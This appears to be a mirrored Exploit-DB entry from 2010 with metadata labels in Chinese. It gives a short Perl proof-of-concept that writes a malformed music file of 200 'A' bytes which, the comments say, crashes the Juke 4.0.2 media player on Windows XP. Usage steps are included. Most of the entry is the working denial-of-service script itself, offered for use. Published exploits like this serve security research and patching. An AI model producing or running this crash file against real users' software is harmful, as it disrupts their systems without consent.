Juke 4.0.2 – Denial of Service Multiple Files

  • 作者: anonymous
    日期: 2010-04-06
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/12096/
  • # Exploit Title: Juke 4.0.2 DoS Multiple Files 
    # Date: April 6, 2010
    # Software Link: [http://www.wolosoft.com/en/download.html]
    # Version: 4.0.2
    # Tested on: Windows XP SP3
    # Author: [anonymous]
    # Juke will Crash when you run this script to make 
    # a file with any of the following extensions
    # .xm .nst .s3m .stm .mod
    # Usage: Run Script -> Add file with + -> Press Play
    my $music = "tunes.xm";
    my $mic = "\x41" x 200;
    print "Creating File . . .\n";
    open (FILE, ">$music");
    print FILE "$mic";
    close FILE;
    print "\nIt's a mix between Jazz and Funk, it's called Junk!";